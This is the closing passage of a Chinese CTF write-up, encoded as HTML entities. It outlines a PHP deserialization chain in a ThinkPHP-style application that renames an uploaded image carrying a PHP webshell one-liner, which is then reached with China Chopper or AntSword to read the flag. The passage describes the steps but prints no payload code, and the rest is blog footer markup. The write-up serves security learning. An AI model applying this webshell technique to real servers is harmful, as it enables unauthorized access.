<p>&#x8FD9;&#x6837;&#xFF0C;&#x5C31;&#x4F1A;&#x8C03;&#x7528;upload_img&#x8FD9;&#x4E2A;&#x51FD;&#x6570;&#x4E86;&#x3002;</p>
<p>&#x6700;&#x7EC8;&#x7684;&#x6B65;&#x9AA4;&#x5C31;&#x662F;&#xFF1A;</p>
<ol>
<li>&#x8BBE;&#x7F6E;$register=0</li>
<li>&#x8C03;&#x7528;Profile&#x7C7B;</li>
<li>&#x8BBE;&#x7F6E;except&#x6570;&#x7EC4;&#xFF0C;index-&gt;upload_img</li>
<li>&#x8BBE;&#x7F6E;$ext=1&#xFF0C;$filename,$filename_tmp</li>
<li>&#x7531;2&#x89E6;&#x53D1;call&#xFF0C;call&#x8C03;&#x7528;get&#xFF0C;call&#x6700;&#x7EC8;&#x8C03;&#x7528;upload_img&#x51FD;&#x6570;</li>
<li>&#x4FEE;&#x6539;&#x6587;&#x4EF6;&#x540D;</li>
<li>&#x83DC;&#x5200;&#x8FDE;&#x63A5;</li>
</ol>
<h2 id="&#x590D;&#x73B0;"><a href="#&#x590D;&#x73B0;" class="headerlink" title="&#x590D;&#x73B0;"></a>&#x590D;&#x73B0;</h2><p>&#x6CE8;&#x518C;&#x4E00;&#x4E2A;&#x8D26;&#x53F7;&#xFF0C;&#x4E0A;&#x4F20;&#x4E00;&#x4E2A;&#x5305;&#x542B;php&#x4E00;&#x53E5;&#x8BDD;&#x7684;&#x56FE;&#x7247;&#xFF0C;&#x5C06;&#x811A;&#x672C;&#x4E2D;&#x7684;&#x56FE;&#x7247;&#x540D;&#x4FEE;&#x6539;&#x4E3A;&#x4E0A;&#x4F20;&#x540E;&#x751F;&#x6210;&#x7684;&#x56FE;&#x7247;&#x540D;&#x3002;</p>
<p>&#x6CE8;&#x518C;&#x4E00;&#x4E2A;&#x65B0;&#x8D26;&#x53F7;&#xFF0C;&#x767B;&#x5F55;&#x3002;&#x5C06;payload&#x751F;&#x6210;&#x51FA;&#x6765;&#xFF0C;&#x5728;&#x7528;&#x6237;&#x4E3B;&#x9875;&#x4FEE;&#x6539;cookies&#xFF0C;&#x5237;&#x65B0;&#x3002;</p>
<p>&#x7528;&#x83DC;&#x5200;&#x6216;&#x8005;&#x8681;&#x5251;&#x8FDE;&#x63A5;&#x56FE;&#x7247;&#x540D;.php&#xFF0C;&#x5728;&#x6839;&#x76EE;&#x5F55;&#x4E0B;&#x62FF;&#x5230;flag&#x3002;</p>
<p><img src="https://i.loli.net/2019/05/26/5cea55c1ec25028053.jpg" alt="xiugaitupian.jpg"></p>
<p><img src="https://i.loli.net/2019/05/26/5cea55c3c204d65669.jpg" alt="xiugaihou.jpg"></p>
<p><img src="https://i.loli.net/2019/05/26/5cea55c23688270315.jpg" alt="getflag.jpg"></p>
<h2 id="&#x603B;&#x7ED3;"><a href="#&#x603B;&#x7ED3;" class="headerlink" title="&#x603B;&#x7ED3;"></a>&#x603B;&#x7ED3;</h2><p>&#x5B66;&#x957F;&#x4EEC;&#x7684;&#x601D;&#x8DEF;&#x771F;&#x7684;&#x592A;&#x5F3A;&#x4E86;&#xFF0C;&#x6BCF;&#x4E2A;&#x91CD;&#x8981;&#x7684;&#x8BED;&#x53E5;&#xFF0C;&#x73AF;&#x73AF;&#x76F8;&#x6263;&#x8FBE;&#x5230;&#x6700;&#x7EC8;&#x5F7C;&#x5CB8;&#x3002;</p>
<p>&#x6700;TP5&#x8FD9;&#x7C7B;&#x6846;&#x67B6;&#x8FD8;&#x662F;&#x4E0D;&#x592A;&#x719F;&#x6089;&#xFF0C;&#x540E;&#x9762;&#x8FD8;&#x8981;&#x591A;&#x603B;&#x7ED3;&#x5B66;&#x4E60;&#x3002;</p>

    
    </div>
    
    <div class="columns is-variable is-1 is-multiline is-mobile">
    
        <span class="column is-narrow"><a class="tag is-light article-tag" href="/tags/Writeup/">#Writeup</a></span>
    
        <span class="column is-narrow"><a class="tag is-light article-tag" href="/tags/PHP/">#PHP</a></span>
    
        <span class="column is-narrow"><a class="tag is-light article-tag" href="/tags/代码审计/">#代码审计</a></span>
    
    </div>
    
    
    <div class="columns is-mobile is-multiline article-nav">
        <span class="column is-12-mobile is-half-desktop  article-nav-prev">
            
            <a href="/2019/05/29/PHP代码审计之SQL注入与审计流程/">PHP代码审计之学习SQL注入与审计流程</a>
            
        </span>
        <span class="column is-12-mobile is-half-desktop  article-nav-next">
            
            <a href="/2019/05/18/PHP代码审计之重装漏洞/">PHP代码审计之重装漏洞</a>
            
        </span>
    </div>
    
</article>




    </div>
</section>
    <footer class="footer">
    <div class="container">
        <div class="columns content">
            <div class="column is-narrow has-text-centered">
                &copy; 2020 Threezh1&nbsp;
                Powered by <a href="http://hexo.io/" target="_blank">Hexo</a> & <a href="http://github.com/ppoffice/hexo-theme-minos">Minos</a>
            </div>
            <div class="column is-hidden-mobile"></div>

            
            <div class="column is-narrow">
                <div class="columns is-mobile is-multiline is-centered">
                
                    
                <a class="column is-narrow has-text-black" title="GitHub" href="https://github.com/Threezh1">
                    
                    GitHub
                    
                </a>
                
                </div>
            </div>
            
            
        </div>
    </div>
</footer>
    <script src="//cdnjs.cloudflare.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
<script src="//cdnjs.cloudflare.com/ajax/libs/moment.js/2.22.2/moment-with-locales.min.js"></script>

<!-- test if the browser is outdated -->
<div id="outdated">
    <h6>Your browser is out-of-date!</h6>
    <p>Update your browser to view this website correctly. <a id="btnUpdateBrowser" href="http://outdatedbrowser.com/">Update my browser now </a></p>
    <p class="last"><a href="#" id="btnCloseUpdateBrowser" title="Close">&times;</a></p>
</div>
<script src="//cdnjs.cloudflare.com/ajax/libs/outdated-browser/1.1.5/outdatedbrowser.min.js"></script>
<script>
    $(document).ready(function () {
        // plugin function, place inside DOM ready function
        outdatedBrowser({
            bgColor: '#f25648',
            color: '#ffffff',
            lowerThan: 'flex'
        })
    });
</script>

<script>
    window.FontAwesomeConfig = {
        searchPseudoElements: true
    }
    moment.locale("chinese");
</script>


    
    
<script src="https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.4/MathJax.js?config=TeX-MML-AM_CHTML"></script>
<script>
    MathJax.Hub.Config({
        "HTML-CSS": {
            matchFontHeight: false
        },
        SVG: {
            matchFontHeight: false
        },
        CommonHTML: {
            matchFontHeight: false
        },
        tex2jax: {
            inlineMath: [
                ['$','$'],
                ['\\(','\\)']
            ]
        }
    });
</script>

    
    
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/katex@0.10.0/dist/katex.min.css" integrity="sha384-9eLZqc9ds8eNjO3TmqPeYcDj8n+Qfa4nuSiGYa6DjLNcv9BtN69ZIulL9+8CqC9Y" crossorigin="anonymous">
<script defer src="https://cdn.jsdelivr.net/npm/katex@0.10.0/dist/katex.min.js" integrity="sha384-K3vbOmF2BtaVai+Qk37uypf7VrgBubhQreNQe9aGsz9lB63dIFiQVlJbr92dw2Lx" crossorigin="anonymous"></script>
<script defer src="https://cdn.jsdelivr.net/npm/katex@0.10.0/dist/contrib/auto-render.min.js" integrity="sha384-kmZOZB5ObwgQnS/DuDg6TScgOiWWBiVt0plIRkZCmE6rDZGrEOQeHM5PcHi+nyqe" crossorigin="anonymous" onload="renderMathInElement(document.body);"></script>

<script>
document.addEventListener("DOMContentLoaded", function() {
    renderMathInElement(document.body, {
        // ...options...
    });
});
</script>

    
    
<script src="//cdnjs.cloudflare.com/ajax/libs/lightgallery/1.6.8/js/lightgallery-all.min.js"></script>
<script src="//cdnjs.cloudflare.com/ajax/libs/justifiedGallery/3.6.5/js/jquery.justifiedGallery.min.js"></script>
<script>
    (function ($) {
        $(document).ready(function () {
            if (typeof($.fn.lightGallery) === 'function') {
                $('.article.gallery').lightGallery({ selector: '.gallery-item' });
            }
            if (typeof($.fn.justifiedGallery) === 'function') {
                $('.justified-gallery').justifiedGallery();
            }
        });
    })(jQuery);
</script>

    
    
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.0/clipboard.min.js"></script>
    <style>
        .hljs {
            position: relative;
        }

        .hljs .clipboard-btn {
            float: right;
            color: #9a9a9a;
            background: none;
            border: none;
            cursor: pointer;
        }

        .hljs .clipboard-btn:hover {
          color: #8a8a8a;
        }

        .hljs > .clipboard-btn {
            display: none;
            position: absolute;
            right: 4px;
            top: 4px;
        }

        .hljs:hover > .clipboard-btn {
            display: inline;
        }

        .hljs > figcaption > .clipboard-btn {
            margin-right: 4px;
        }
    </style>
    <script>
      $(document).ready(function () {
        $('figure.hljs').each(function(i, figure) {
          var codeId = 'code-' + i;
          var code = figure.querySelector('.code');
          var copyButton = $('<button>Copy <i class="far fa-clipboard"></i></button>');
          code.id = codeId;
          copyButton.addClass('clipboard-btn');
          copyButton.attr('data-clipboard-target-id', codeId);

          var figcaption = figure.querySelector('figcaption');

          if (figcaption) {
            figcaption.append(copyButton[0]);
          } else {
            figure.prepend(copyButton[0]);
          }
        })

        var clipboard = new ClipboardJS('.clipboard-btn', {
          target: function(trigger) {
            return document.getElementById(trigger.getAttribute('data-clipboard-target-id'));
          }
        });
        clipboard.on('success', function(e) {
          e.clearSelection();
        })
      })
    </script>

    


<script src="/js/script.js"></script>

    
    <div class="searchbox ins-search">
    <div class="searchbox-mask"></div>
    <div class="searchbox-container ins-search-container">
        <div class="searchbox-input-wrapper">
            <input type="text" class="searchbox-input ins-search-input" placeholder="Suche etwas...">
            <span class="searchbox-close ins-close ins-selectable"><i class="fa fa-times-circle"></i></span>
        </div>
        <div class="searchbox-result-wrapper ins-section-wrapper">
            <div class="ins-section-container"></div>
        </div>
    </div>
</div>
<script>
    (function (window) {
        var INSIGHT_CONFIG = {
            TRANSLATION: {
                POSTS: 'Posts',
                PAGES: 'Seiten',
                CATEGORIES: 'Kategorien',
                TAGS: 'Tags',
                UNTITLED: '(Untitled)',
            },
            CONTENT_URL: '/content.json',
        };
        window.INSIGHT_CONFIG = INSIGHT_CONFIG;
    })(window);
</script>
<script src="/js/insight.js"></script>
    
</body>
</html>